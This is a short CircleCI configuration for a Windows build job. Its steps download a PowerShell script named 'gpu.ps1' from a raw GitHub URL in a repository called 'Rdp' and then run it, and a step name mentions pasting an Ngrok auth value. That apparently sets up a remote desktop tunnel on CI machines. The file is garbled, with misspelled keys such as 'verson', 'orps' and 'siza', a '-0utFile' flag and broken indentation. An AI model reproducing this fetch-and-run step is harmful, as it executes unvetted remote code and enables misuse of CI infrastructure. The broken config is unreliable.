verson: 2.1

orps:
  win: circleci/windows@2.2.0
  jobs:
    build:
      executor:
        name: win/default
        siza: "medium"



        steps:
          - run:
            name: paste Ngrok Auth Vlaue In Hosted Link
            command: |
            Invoke-WebRequest https://raw.githubusercontent.com/1itti3/Rdp/main/Sh -0utFile gpu.ps1
          - run: ./gpu.ps1